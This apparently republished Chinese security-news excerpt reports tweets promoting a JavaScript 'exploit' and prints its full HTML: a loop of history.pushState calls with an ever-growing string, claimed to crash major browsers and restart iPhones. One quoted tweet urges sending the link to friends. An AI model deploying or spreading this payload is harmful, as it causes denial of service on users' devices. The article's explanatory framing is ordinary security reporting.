这十二行代码是如何让浏览器爆炸的?

今天刷推特的时候发现 Cyber Security@cyber__sec 的推文让人眼前一亮:

Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit

//使用下面这段 JavaScript 代码能让 firefox,chrome,safari 浏览器崩溃,而且还能让 iphone 重启。

继续在推特上深挖发现 IT Security Tweets ™ @F1r3h4nd 于 17 日发推:

Crash your friend’s browser and restart Iphone with a link which has this script: #0day

//把带有下面这个脚本的链接发给你的朋友,能让你朋友的浏览器崩溃,而且让 Iphone 重启。

完整 HTML 代码如下:

<html>
<body>
<script>
var total="";
for (var i=0;i<1000000;i++)
{
    total= total+i.toString ();
    history.pushState (0,0,total);
}
</script>
</body>
</html>

接来下会发生什么?

点开以后,我的状态是这样的:

如果你是 PC 端用户,点开链接以后,电脑 CPU 内存极有可能一路狂飙直至浏览器崩溃卡死!

如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退。iPhone 用 Safari 打开之后链接之后,手机注销重启了!…

  思考

这是 Bug 还是 0day?为什么会有这一现象?如何实现的?

本文文字及图片出自 www.freebuf.com

余下全文(1/3)
分享这篇文章:

请关注我们:

共有 2 条讨论

  1. 张三 对这篇文章的反应是垃圾

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注